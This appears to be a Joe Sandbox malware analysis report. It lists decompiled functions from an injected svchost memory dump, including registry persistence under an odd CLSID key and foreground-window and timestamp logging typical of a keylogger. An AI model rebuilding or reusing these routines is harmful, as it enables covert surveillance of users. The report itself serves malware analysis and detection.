                                                            • API ID: File$Local$AllocCloseCreateDirectoryFreeHandleReadSizeSystem
                                                            • String ID: winssyslog
                                                            • API String ID: 245316060-1874786851
                                                            • Opcode ID: 5b67b33968174e760cf79a53cf29cb5545573e63a39bffb90f0deaf9dd6e02fa
                                                            • Instruction ID: a1ed136c1bc14f645c1dd243ba9af2f75d37d86376ee4b9951e290ea84218c24
                                                            • Opcode Fuzzy Hash: 5b67b33968174e760cf79a53cf29cb5545573e63a39bffb90f0deaf9dd6e02fa
                                                            • Instruction Fuzzy Hash: F941E533714B8496EB228FA5E45C3DAB7A1FBC9B94F448220DA8903B5ADF3DC449C700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 52%
                                                            			E0000022B22BAF53C770(void* __ecx, long long __rax, void* __rdx, void* __rsi, void* __r8) {
                                                            				void* _t12;
                                                            				void* _t15;
                                                            				void* _t20;
                                                            				long long _t23;
                                                            				intOrPtr _t24;
                                                            				long long _t27;
                                                            				void* _t32;
                                                            				intOrPtr _t35;
                                                            				void* _t38;
                                                            				void* _t39;
                                                            				void* _t40;
                                                            
                                                            				_t23 = __rax;
                                                            				r8d = r8d - 1;
                                                            				_t24 =  *((intOrPtr*)(_t39 + 0x50));
                                                            				_t35 =  *((intOrPtr*)(_t39 + 0x58));
                                                            				_t40 = _t39 + 0x40;
                                                            				_pop(_t32);
                                                            				goto 0xaf53cb30;
                                                            				_t12 = E0000022B22BAF54DAD0(__rdx + 1);
                                                            				asm("adc eax, [ds:ecx]");
                                                            				 *((intOrPtr*)(_t38 - 0x397bf040)) =  *((intOrPtr*)(_t38 - 0x397bf040)) + _t12;
                                                            				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + _t12;
                                                            				asm("rol dword [eax], 1");
                                                            				 *((intOrPtr*)(__rax)) =  *((intOrPtr*)(__rax)) + _t12;
                                                            				_t27 =  *0xaf599c18; // 0x0
                                                            				if (_t27 == 0) goto 0xaf53c7c3;
                                                            				 *((char*)(_t27 + 1)) = 0;
                                                            				E0000022B22BAF53C310(_t20, _t27);
                                                            				 *0xaf599c18 = 0;
                                                            				E0000022B22BAF55A7EC(_t23, _t27);
                                                            				 *((intOrPtr*)(_t40 + 0x20)) = _t24 - 1;
                                                            				_t15 = E0000022B22BAF5342D0(_t23, _t24, _t23,  *((intOrPtr*)(_t35 + 8)),  *((intOrPtr*)(_t35 + 8)), _t38, _t32 + 1);
                                                            				 *0xaf599c18 = _t23;
                                                            				return _t15;
                                                            			}














                                                            0x22baf53c770
                                                            0x22baf53c770
                                                            0x22baf53c779
                                                            0x22baf53c77e
                                                            0x22baf53c783
                                                            0x22baf53c787
                                                            0x22baf53c788
                                                            0x22baf53c78d
                                                            0x22baf53c78e
                                                            0x22baf53c791
                                                            0x22baf53c797
                                                            0x22baf53c79b
                                                            0x22baf53c79d
                                                            0x22baf53c79f
                                                            0x22baf53c7ad
                                                            0x22baf53c7af
                                                            0x22baf53c7b3
                                                            0x22baf53c7b8
                                                            0x22baf53c7c8
                                                            0x22baf53c7d3
                                                            0x22baf53c7de
                                                            0x22baf53c7e3
                                                            0x22baf53c7f9

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseCreateValue$EventOpenQuerywsprintf
                                                            • String ID: Global$SOFTWARE\Classes\CLSID\%s
                                                            • API String ID: 2801368686-1865207932
                                                            • Opcode ID: 6c38d988e4275f80fd67e948962211e87cb4319abc680d30facb9dcf2d5dfe16
                                                            • Instruction ID: 72950bba680846268b578d5d3d8c281e06cd02e0fdbe0605691c564ec91d8080
                                                            • Opcode Fuzzy Hash: 6c38d988e4275f80fd67e948962211e87cb4319abc680d30facb9dcf2d5dfe16
                                                            • Instruction Fuzzy Hash: 7631D533214B84A2EB319FA5F49C3DEB360F788794F400126DA8D03A5ADF79C105CB00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseCreateValue
                                                            • String ID: SOFTWARE\Classes\CLSID\{SDTB8HQ9-96HV-S78H-Z3GI-J7UCTY784HHC}
                                                            • API String ID: 1818849710-2030040551
                                                            • Opcode ID: a21e8377b68b8e6e3f473a400492c874138a9856dcec82d784891677b925615a
                                                            • Instruction ID: 4049cde319afc7536f5073000061bcf2fd136d840b15002a8139c15c5cf69cc2
                                                            • Opcode Fuzzy Hash: a21e8377b68b8e6e3f473a400492c874138a9856dcec82d784891677b925615a
                                                            • Instruction Fuzzy Hash: 4B316933618B80A6EB719F54F44C78AB7A0F3847A4F444215EB9943BA9DF3AC145CB04
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 37%
                                                            			E0000022B22BAF5489C0(signed int __ecx, long long __rbx, long long* __rcx, intOrPtr* __rdx, long long __rsi, long long _a8, long long _a16) {
                                                            				void* __rdi;
                                                            				void* _t21;
                                                            				void* _t23;
                                                            				void* _t25;
                                                            				void* _t35;
                                                            				intOrPtr _t37;
                                                            				void* _t38;
                                                            				intOrPtr _t40;
                                                            				long long* _t48;
                                                            				intOrPtr _t51;
                                                            				void* _t52;
                                                            				long long _t60;
                                                            
                                                            				_t60 = __rsi;
                                                            				_a16 = __rbx;
                                                            				_t48 = __rcx;
                                                            				if (__rcx == __rdx) goto 0xaf548ab9;
                                                            				_t37 =  *((intOrPtr*)(__rcx + 0x18));
                                                            				if (_t37 - 8 < 0) goto 0xaf548a3c;
                                                            				_t51 =  *((intOrPtr*)(__rcx));
                                                            				_t38 = _t37 + 1;
                                                            				if (_t38 - 0xffffffff > 0) goto 0xaf548ac7;
                                                            				if (_t38 + _t38 - 0x1000 < 0) goto 0xaf548a37;
                                                            				if ((__ecx & 0x0000001f) != 0) goto 0xaf548acd;
                                                            				_t40 =  *((intOrPtr*)(_t51 - 8));
                                                            				if (_t40 - _t51 >= 0) goto 0xaf548ad3;
                                                            				_t52 = _t51 - _t40;
                                                            				if (_t52 - 8 < 0) goto 0xaf548ad9;
                                                            				if (_t52 - 0x27 > 0) goto 0xaf548adf;
                                                            				0xaf55a85c();
                                                            				 *((long long*)(__rcx + 0x18)) = 7;
                                                            				_a8 = __rsi;
                                                            				 *((long long*)(__rcx + 0x10)) = __rsi;
                                                            				if ( *((long long*)(__rcx + 0x18)) - 8 < 0) goto 0xaf548a5b;
                                                            				goto 0xaf548a5e;
                                                            				 *((short*)(__rcx)) = 0;
                                                            				_t35 =  *((long long*)(__rdx + 0x18)) - 8;
                                                            				if (_t35 >= 0) goto 0xaf548a82;
                                                            				if (_t35 == 0) goto 0xaf548a8b;
                                                            				_t21 = E0000022B22BAF562BA0(__ecx, _t23, 0, _t25, __rcx, __rdx, __rdx, __rsi,  *((intOrPtr*)(__rdx + 0x10)) + 1 +  *((intOrPtr*)(__rdx + 0x10)) + 1);
                                                            				goto 0xaf548a8b;
                                                            				 *_t48 =  *__rdx;
                                                            				 *((long long*)(__rdx)) = _t60;
                                                            				 *((long long*)(_t48 + 0x10)) =  *((intOrPtr*)(__rdx + 0x10));
                                                            				 *((long long*)(_t48 + 0x18)) =  *((intOrPtr*)(__rdx + 0x18));
                                                            				 *((long long*)(__rdx + 0x18)) = 7;
                                                            				 *((long long*)(__rdx + 0x10)) = _t60;
                                                            				if ( *((long long*)(__rdx + 0x18)) - 8 < 0) goto 0xaf548ab1;
                                                            				 *((short*)( *__rdx)) = 0;
                                                            				return _t21;
                                                            			}















                                                            0x22baf5489c0
                                                            0x22baf5489c0
                                                            0x22baf5489cd
                                                            0x22baf5489d3
                                                            0x22baf5489d9
                                                            0x22baf5489e1
                                                            0x22baf5489e3
                                                            0x22baf5489e6
                                                            0x22baf5489f6
                                                            0x22baf548a05
                                                            0x22baf548a0a
                                                            0x22baf548a10
                                                            0x22baf548a17
                                                            0x22baf548a1d
                                                            0x22baf548a24
                                                            0x22baf548a2e
                                                            0x22baf548a37
                                                            0x22baf548a3c
                                                            0x22baf548a44
                                                            0x22baf548a50
                                                            0x22baf548a54
                                                            0x22baf548a59
                                                            0x22baf548a5e
                                                            0x22baf548a61
                                                            0x22baf548a66
                                                            0x22baf548a70
                                                            0x22baf548a7b
                                                            0x22baf548a80
                                                            0x22baf548a85
                                                            0x22baf548a88
                                                            0x22baf548a8f
                                                            0x22baf548a97
                                                            0x22baf548a9b
                                                            0x22baf548aa8
                                                            0x22baf548aac
                                                            0x22baf548ab1
                                                            0x22baf548ac6

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: _invalid_parameter_noinfo_noreturn$Desktop$CloseEventInputOpen
                                                            • String ID:
                                                            • API String ID: 3681804378-0
                                                            • Opcode ID: 351bd4cf82b72b7d9a8270b8672b5d02ceb0758ad5389e9b2972241de80f60ff
                                                            • Instruction ID: fb65f65d38e3c80f54ff935a97ffc768579a732a4d638fa437c36db7430e0cc6
                                                            • Opcode Fuzzy Hash: 351bd4cf82b72b7d9a8270b8672b5d02ceb0758ad5389e9b2972241de80f60ff
                                                            • Instruction Fuzzy Hash: E441E433A11B44A2EE2A9B96D04D3DD7362F704B96F044914DB7D03B97EF79D0A08340
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 46%
                                                            			E0000022B22BAF534F40(void* __rax, long long __rbx, void* __rdx, long long _a24) {
                                                            				void* _t5;
                                                            				void* _t7;
                                                            
                                                            				_t7 = __rax;
                                                            				_a24 = __rbx;
                                                            				_t5 = E0000022B22BAF564404(__rax, __rdx, lstrlenW(??) + 1 + lstrlenW(??) + 1, __rdx);
                                                            				if (_t7 != 0) goto 0xaf534f76;
                                                            				return _t5;
                                                            			}





                                                            0x22baf534f40
                                                            0x22baf534f40
                                                            0x22baf534f5e
                                                            0x22baf534f69
                                                            0x22baf534f75

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CharNext$AttributesCreateDirectoryErrorFileLastlstrcpylstrlen
                                                            • String ID:
                                                            • API String ID: 227312388-0
                                                            • Opcode ID: b98922420a5a91ca64204dd2e015ca6674b61012e891329521c81d132bef4861
                                                            • Instruction ID: 779f1a96c97dc4ab0577428471040b9d52b0d326b5fd73714e16e661744aaffa
                                                            • Opcode Fuzzy Hash: b98922420a5a91ca64204dd2e015ca6674b61012e891329521c81d132bef4861
                                                            • Instruction Fuzzy Hash: 87419113600641A1EF769F96A56C3F973F0E741F94F889114DA0A03796EF3AC895C390
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Value$Query$Delete$CloseOpen
                                                            • String ID:
                                                            • API String ID: 2816288289-0
                                                            • Opcode ID: f93e3db65b3185e220e16303b92621299856dfc2623d298f8a7286e3c4b46d5f
                                                            • Instruction ID: 1439cf365db2884a67a27ed2bfc2cababd9de57df83b3df8e853c9e3292d6a55
                                                            • Opcode Fuzzy Hash: f93e3db65b3185e220e16303b92621299856dfc2623d298f8a7286e3c4b46d5f
                                                            • Instruction Fuzzy Hash: 0C418B37728B8096EB718F52E84C79EB7A5F788BC0F441025AA8E47B29DF39C500CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 25%
                                                            			E0000022B22BAF551BA0(long long _a8, long long _a16) {
                                                            				void* _t46;
                                                            				void* _t48;
                                                            				void* _t51;
                                                            				long long _t58;
                                                            				long long _t59;
                                                            				void* _t61;
                                                            				void* _t73;
                                                            				void* _t75;
                                                            				long long _t76;
                                                            				void* _t78;
                                                            				void* _t82;
                                                            				intOrPtr _t83;
                                                            
                                                            				_a8 = _t59;
                                                            				_a16 = _t76;
                                                            				_t75 = _t61;
                                                            				EnterCriticalSection(??);
                                                            				if ( *((intOrPtr*)(_t75 + 0x80)) == 0) goto 0xaf551be7;
                                                            				E0000022B22BAF564114(_t46, _t48, _t51, _t59, _t73, _t76, _t82);
                                                            				 *((long long*)(_t75 + 0x80)) = _t76;
                                                            				 *((long long*)(_t75 + 0x88)) = _t76;
                                                            				 *((long long*)(_t75 + 0x90)) = _t76;
                                                            				ResetEvent(??);
                                                            				ResetEvent(??);
                                                            				ResetEvent(??);
                                                            				if ( *((intOrPtr*)(_t75 + 0x1c0)) <= 0) goto 0xaf551c77;
                                                            				asm("o16 nop [eax+eax]");
                                                            				_t83 =  *((intOrPtr*)(_t75 + 0x1c8));
                                                            				if (_t83 ==  *((intOrPtr*)(_t75 + 0x1d0))) goto 0xaf551c41;
                                                            				_t58 =  *((intOrPtr*)(_t83 + 8));
                                                            				 *((long long*)(_t75 + 0x1c8)) = _t58;
                                                            				 *((long long*)(_t58 + 0x10)) = _t76;
                                                            				goto 0xaf551c54;
                                                            				if (_t83 == 0) goto 0xaf551c77;
                                                            				 *((long long*)(_t75 + 0x1c8)) = _t76;
                                                            				 *((long long*)(_t75 + 0x1d0)) = _t76;
                                                            				if (_t83 == 0) goto 0xaf551c77;
                                                            				 *((long long*)(_t83 + 8)) = _t76;
                                                            				 *((long long*)(_t83 + 0x10)) = _t76;
                                                            				 *((intOrPtr*)(_t75 + 0x1c0)) =  *((intOrPtr*)(_t75 + 0x1c0)) - 1;
                                                            				HeapFree(??, ??, ??);
                                                            				goto 0xaf551c20;
                                                            				E0000022B22BAF53CE40(_t59, _t75 + 0xc8, _t73, _t76, _t78);
                                                            				if ( *((intOrPtr*)(_t75 + 0x98)) == 0) goto 0xaf551c95;
                                                            				HeapDestroy(??);
                                                            				HeapCreate(??, ??, ??);
                                                            				 *((long long*)(_t75 + 0x98)) = _t58;
                                                            				 *((intOrPtr*)(_t75 + 0x1f8)) = 0;
                                                            				 *((intOrPtr*)(_t75 + 0x200)) = 0;
                                                            				 *((intOrPtr*)(_t75 + 0x1fc)) = 0;
                                                            				 *((intOrPtr*)(_t75 + 0x6c)) = 3;
                                                            				SetEvent(??);
                                                            				return LeaveCriticalSection(??);
                                                            			}















                                                            0x22baf551ba0
                                                            0x22baf551ba5
                                                            0x22baf551baf
                                                            0x22baf551bb9
                                                            0x22baf551bcb
                                                            0x22baf551bcd
                                                            0x22baf551bd2
                                                            0x22baf551bd9
                                                            0x22baf551be0
                                                            0x22baf551bee
                                                            0x22baf551bfb
                                                            0x22baf551c08
                                                            0x22baf551c14
                                                            0x22baf551c16
                                                            0x22baf551c20
                                                            0x22baf551c2e
                                                            0x22baf551c30
                                                            0x22baf551c34
                                                            0x22baf551c3b
                                                            0x22baf551c3f
                                                            0x22baf551c44
                                                            0x22baf551c46
                                                            0x22baf551c4d
                                                            0x22baf551c57
                                                            0x22baf551c59
                                                            0x22baf551c5f
                                                            0x22baf551c63
                                                            0x22baf551c6f
                                                            0x22baf551c75
                                                            0x22baf551c7e
                                                            0x22baf551c8d
                                                            0x22baf551c8f
                                                            0x22baf551ca9
                                                            0x22baf551caf
                                                            0x22baf551cba
                                                            0x22baf551cc0
                                                            0x22baf551cc6
                                                            0x22baf551ccc
                                                            0x22baf551cd3
                                                            0x22baf551cef

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Event$HeapReset$CreateCriticalDestroyEnterFreeSection
                                                            • String ID:
                                                            • API String ID: 1658878062-0
                                                            • Opcode ID: ea9856bec81fc313ff7bd5c827af577a1273390f3cc89269c27676be64fff0af
                                                            • Instruction ID: cdf9dee239bd7db46abb8241ea923a91bf15be16947b330491317a1727bc8a68
                                                            • Opcode Fuzzy Hash: ea9856bec81fc313ff7bd5c827af577a1273390f3cc89269c27676be64fff0af
                                                            • Instruction Fuzzy Hash: A9311633601B80F2EA6E9BA1E64C3ECB7A4F748B84F104516DB6A43752CF3294B5C740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 17%
                                                            			E0000022B22BAF5441B0(void* __edx, void* __rcx, void* __rdx, void* __r8) {
                                                            				void* __rbx;
                                                            				void* __rsi;
                                                            				void* __r14;
                                                            				void* _t86;
                                                            				signed long long _t106;
                                                            				signed long long _t107;
                                                            				signed long long _t110;
                                                            				signed long long _t111;
                                                            				signed long long _t113;
                                                            				long long _t115;
                                                            				long long _t135;
                                                            				intOrPtr _t145;
                                                            				void* _t146;
                                                            				void* _t147;
                                                            				void* _t148;
                                                            				signed long long _t149;
                                                            				void* _t156;
                                                            				void* _t157;
                                                            
                                                            				_t147 = _t148 - 0x1c0;
                                                            				_t149 = _t148 - 0x2c0;
                                                            				_t106 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_t107 = _t106 ^ _t149;
                                                            				 *(_t147 + 0x1b0) = _t107;
                                                            				_t156 = __rcx;
                                                            				_t146 = __rdx;
                                                            				 *((intOrPtr*)(_t147 - 0x80)) = 0;
                                                            				_t135 = __rdx + 1;
                                                            				_t86 = __r8 - 1;
                                                            				_t115 = __rcx + _t135;
                                                            				 *((long long*)(_t149 + 0x78)) = _t135;
                                                            				 *((long long*)(_t149 + 0x70)) = _t115;
                                                            				r14d = r8d;
                                                            				if (_t115 - _t135 - 4 >= 0) goto 0xaf544211;
                                                            				 *((intOrPtr*)(_t147 - 0x80)) = 1;
                                                            				goto 0xaf54421c;
                                                            				 *((long long*)(_t149 + 0x78)) = _t135 + 4;
                                                            				E0000022B22BAF543530(_t149 + 0x70);
                                                            				if ( *((intOrPtr*)(_t147 - 0x80)) != 0) goto 0xaf544404;
                                                            				asm("xorps xmm0, xmm0");
                                                            				 *((intOrPtr*)(_t149 + 0x60)) = 0;
                                                            				r8d = r14d;
                                                            				 *((intOrPtr*)(_t147 - 0x80)) = 0;
                                                            				asm("movdqu [esp+0x70], xmm0");
                                                            				E0000022B22BAF53DE20(__edx, _t107, _t113, _t149 + 0x70, _t146, _t146, _t157);
                                                            				r9d = 0x20119;
                                                            				r8d = 0;
                                                            				 *(_t149 + 0x20) = _t149 + 0x68;
                                                            				if (RegOpenKeyExW(??, ??, ??, ??, ??) != 0) goto 0xaf5443c1;
                                                            				 *(_t149 + 0x38) = _t113;
                                                            				 *(_t149 + 0x30) = _t113;
                                                            				 *(_t149 + 0x28) = _t113;
                                                            				 *(_t149 + 0x20) = _t113;
                                                            				 *((intOrPtr*)(_t149 + 0x64)) = 0x104;
                                                            				if (RegEnumKeyExW(??, ??, ??, ??, ??, ??, ??, ??) != 0) goto 0xaf5443b6;
                                                            				asm("o16 nop [eax+eax]");
                                                            				r9d = 0x20119;
                                                            				 *(_t149 + 0x20) = _t147 - 0x70;
                                                            				r8d = 0;
                                                            				 *((intOrPtr*)(_t149 + 0x60)) = 0;
                                                            				if (RegOpenKeyExW(??, ??, ??, ??, ??) != 0) goto 0xaf544334;
                                                            				_t110 = _t149 + 0x60;
                                                            				 *(_t149 + 0x58) = _t113;
                                                            				r9d = 0;
                                                            				 *(_t149 + 0x50) = _t113;
                                                            				r8d = 0;
                                                            				 *(_t149 + 0x48) = _t113;
                                                            				 *(_t149 + 0x40) = _t113;
                                                            				 *(_t149 + 0x38) = _t113;
                                                            				 *(_t149 + 0x30) = _t113;
                                                            				 *(_t149 + 0x28) = _t113;
                                                            				 *(_t149 + 0x20) = _t110;
                                                            				RegQueryInfoKeyW(??, ??, ??, ??, ??, ??, ??, ??, ??, ??, ??, ??);
                                                            				RegCloseKey(??);
                                                            				_t111 = _t110 | 0xffffffff;
                                                            				_t112 = _t111 + 1;
                                                            				if ( *((intOrPtr*)(_t147 - 0x60 + 2 + _t111 * 2)) != 0) goto 0xaf544340;
                                                            				r8d = 2 + (_t111 + 1) * 2;
                                                            				E0000022B22BAF53DE20(0, _t111 + 1, _t113, _t149 + 0x70, _t147 - 0x60, _t146, _t157);
                                                            				r8d = 4;
                                                            				 *((intOrPtr*)(_t147 - 0x78)) =  *((intOrPtr*)(_t149 + 0x60));
                                                            				E0000022B22BAF53DE20(0, _t111 + 1, _t113, _t149 + 0x70, _t147 - 0x78, _t146, _t157);
                                                            				 *(_t149 + 0x38) = _t113;
                                                            				 *(_t149 + 0x30) = _t113;
                                                            				 *(_t149 + 0x28) = _t113;
                                                            				 *(_t149 + 0x20) = _t113;
                                                            				 *((intOrPtr*)(_t149 + 0x64)) = 0x104;
                                                            				if (RegEnumKeyExW(??, ??, ??, ??, ??, ??, ??, ??) == 0) goto 0xaf5442c0;
                                                            				RegCloseKey(??);
                                                            				if (_t107 == 0) goto 0xaf5443ce;
                                                            				E0000022B22BAF55A7E4(_t111 + 1, _t107);
                                                            				_t145 =  *((intOrPtr*)(_t149 + 0x70));
                                                            				if (_t145 != 0) goto 0xaf5443dd;
                                                            				goto 0xaf5443e8;
                                                            				r9b = 0x3f;
                                                            				r8d =  *((intOrPtr*)(_t149 + 0x78)) -  *((intOrPtr*)(_t149 + 0x70));
                                                            				E0000022B22BAF531FF0( *((intOrPtr*)(_t156 + 8)), _t145);
                                                            				if (_t145 == 0) goto 0xaf544404;
                                                            				E0000022B22BAF55A7E4(_t112, _t145);
                                                            				return E0000022B22BAF55A7C0(_t86, _t112,  *(_t147 + 0x1b0) ^ _t149);
                                                            			}





















                                                            0x22baf5441bb
                                                            0x22baf5441c3
                                                            0x22baf5441ca
                                                            0x22baf5441d1
                                                            0x22baf5441d4
                                                            0x22baf5441db
                                                            0x22baf5441e0
                                                            0x22baf5441e3
                                                            0x22baf5441e6
                                                            0x22baf5441e9
                                                            0x22baf5441ed
                                                            0x22baf5441f0
                                                            0x22baf5441f5
                                                            0x22baf5441fa
                                                            0x22baf544204
                                                            0x22baf544206
                                                            0x22baf54420f
                                                            0x22baf544217
                                                            0x22baf544221
                                                            0x22baf54422c
                                                            0x22baf544232
                                                            0x22baf544235
                                                            0x22baf544239
                                                            0x22baf54423c
                                                            0x22baf544247
                                                            0x22baf54424d
                                                            0x22baf544257
                                                            0x22baf54425d
                                                            0x22baf544260
                                                            0x22baf544273
                                                            0x22baf544283
                                                            0x22baf54428c
                                                            0x22baf544293
                                                            0x22baf54429a
                                                            0x22baf54429f
                                                            0x22baf5442af
                                                            0x22baf5442b5
                                                            0x22baf5442c9
                                                            0x22baf5442cf
                                                            0x22baf5442d4
                                                            0x22baf5442d7
                                                            0x22baf5442e9
                                                            0x22baf5442ef
                                                            0x22baf5442f4
                                                            0x22baf5442f9
                                                            0x22baf5442fc
                                                            0x22baf544301
                                                            0x22baf544304
                                                            0x22baf54430b
                                                            0x22baf544310
                                                            0x22baf544315
                                                            0x22baf54431a
                                                            0x22baf54431f
                                                            0x22baf544324
                                                            0x22baf54432e
                                                            0x22baf544338
                                                            0x22baf544345
                                                            0x22baf544349
                                                            0x22baf54434b
                                                            0x22baf54435c
                                                            0x22baf544369
                                                            0x22baf54436f
                                                            0x22baf544377
                                                            0x22baf544386
                                                            0x22baf54438f
                                                            0x22baf544396
                                                            0x22baf54439b
                                                            0x22baf5443a0
                                                            0x22baf5443b0
                                                            0x22baf5443bb
                                                            0x22baf5443c4
                                                            0x22baf5443c9
                                                            0x22baf5443ce
                                                            0x22baf5443d6
                                                            0x22baf5443db
                                                            0x22baf5443ec
                                                            0x22baf5443ef
                                                            0x22baf5443f2
                                                            0x22baf5443fa
                                                            0x22baf5443ff
                                                            0x22baf544424

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseEnumOpen$InfoQuery
                                                            • String ID:
                                                            • API String ID: 396531129-0
                                                            • Opcode ID: f25342361dbc1c131d6f18fd2f464d559ad3126229c17c03f8f4a052551edb80
                                                            • Instruction ID: 58d608f3c7ac71f1076ce2968bfad68f8aad63a02e7b5ba01f5a52e88ab76fb0
                                                            • Opcode Fuzzy Hash: f25342361dbc1c131d6f18fd2f464d559ad3126229c17c03f8f4a052551edb80
                                                            • Instruction Fuzzy Hash: 2061A073608B8496EB21CFA5F8896DEBBB1F784788F544225EE8943A59DF39C045CB00
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 63%
                                                            			E0000022B22BAF53D620(void* __ebx, long long __rbx, void* __rcx, signed int __rdi, long long __rsi, void* _a16, long long _a24, void* _a32) {
                                                            				signed int _v24;
                                                            				char _v2072;
                                                            				char _v2600;
                                                            				signed short _v2604;
                                                            				signed short _v2606;
                                                            				signed short _v2608;
                                                            				signed short _v2610;
                                                            				signed short _v2614;
                                                            				signed short _v2616;
                                                            				signed int _v2632;
                                                            				signed int _v2640;
                                                            				signed int _v2648;
                                                            				signed int _v2656;
                                                            				signed int _v2664;
                                                            				void* __rbp;
                                                            				signed int _t48;
                                                            				signed int _t49;
                                                            				void* _t59;
                                                            				void* _t68;
                                                            				void* _t69;
                                                            				void* _t73;
                                                            				signed long long _t82;
                                                            				signed long long _t83;
                                                            				void* _t85;
                                                            				intOrPtr* _t87;
                                                            				signed short* _t94;
                                                            				signed short* _t96;
                                                            				signed long long _t113;
                                                            				signed long long _t114;
                                                            				intOrPtr _t117;
                                                            				intOrPtr _t118;
                                                            				intOrPtr* _t119;
                                                            				struct _SYSTEMTIME* _t121;
                                                            				void* _t122;
                                                            				void* _t124;
                                                            				long long _t130;
                                                            				void* _t131;
                                                            
                                                            				if (__rcx == 0) goto 0xaf53d82f;
                                                            				_t131 = _t124;
                                                            				_t82 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_t83 = _t82 ^ _t124 - 0x00000a80;
                                                            				_v24 = _t83;
                                                            				 *((long long*)(_t131 + 0x10)) = __rbx;
                                                            				_t122 = __rcx;
                                                            				 *((long long*)(_t131 + 0x20)) = __rdi;
                                                            				_t113 = __rdi | 0xffffffff;
                                                            				if ( *((short*)(__rcx + (_t113 + 1) * 2)) != 0) goto 0xaf53d660;
                                                            				if (__ebx - 1 < 0) goto 0xaf53d807;
                                                            				_a24 = __rsi;
                                                            				GetForegroundWindow();
                                                            				r8d = 0x101;
                                                            				_v2616 = _t83;
                                                            				GetWindowTextW(??, ??, ??);
                                                            				_t117 =  *0xaf599e30; // 0x0
                                                            				_t130 = _v2616;
                                                            				_t73 = _t130 -  *((intOrPtr*)(_t117 + 0x10));
                                                            				if (_t73 != 0) goto 0xaf53d6dc;
                                                            				_t11 = _t117 + 0x18; // 0x18
                                                            				_t94 = _t11;
                                                            				_t48 =  *(_t94 +  &_v2600 - _t94) & 0x0000ffff;
                                                            				if (_t73 != 0) goto 0xaf53d6d4;
                                                            				if (_t48 != 0) goto 0xaf53d6c0;
                                                            				if (( *_t94 & 0x0000ffff) - _t48 == 0) goto 0xaf53d7a8;
                                                            				_t85 = _t117 -  &_v2600;
                                                            				_t96 =  &_v2600;
                                                            				_t16 = _t85 + 0x18; // 0x18
                                                            				_t49 =  *_t96 & 0x0000ffff;
                                                            				 *(_t16 + _t96) = _t49;
                                                            				if (_t49 != 0) goto 0xaf53d6f0;
                                                            				 *((long long*)(_t117 + 0x10)) = _t130;
                                                            				_t114 = _t113 + 1;
                                                            				if ( *((short*)( &_v2600 + _t114 * 2)) != 0) goto 0xaf53d710;
                                                            				if (_t114 == 0) goto 0xaf53d7a8;
                                                            				r8d = 0x800;
                                                            				E0000022B22BAF563830(_t59, 0, _t68, _t69,  &_v2072, _t16, _t114,  &_v2600 - _t94);
                                                            				GetLocalTime(_t121);
                                                            				r8d = _v2610 & 0x0000ffff;
                                                            				r10d = _v2614 & 0x0000ffff;
                                                            				r9d = _v2616 & 0x0000ffff;
                                                            				_v2632 = _v2604 & 0x0000ffff;
                                                            				_v2640 = _v2606 & 0x0000ffff;
                                                            				_v2648 = _v2608 & 0x0000ffff;
                                                            				_v2656 = r8d;
                                                            				_v2664 = r10d;
                                                            				wsprintfW(??, ??);
                                                            				E0000022B22BAF53D620(__ebx, _t113 + 1,  &_v2072, _t114, _t117);
                                                            				_t118 =  *0xaf599e30; // 0x0
                                                            				if ( *((char*)(_t118 + 0x218)) == 0) goto 0xaf53d7c0;
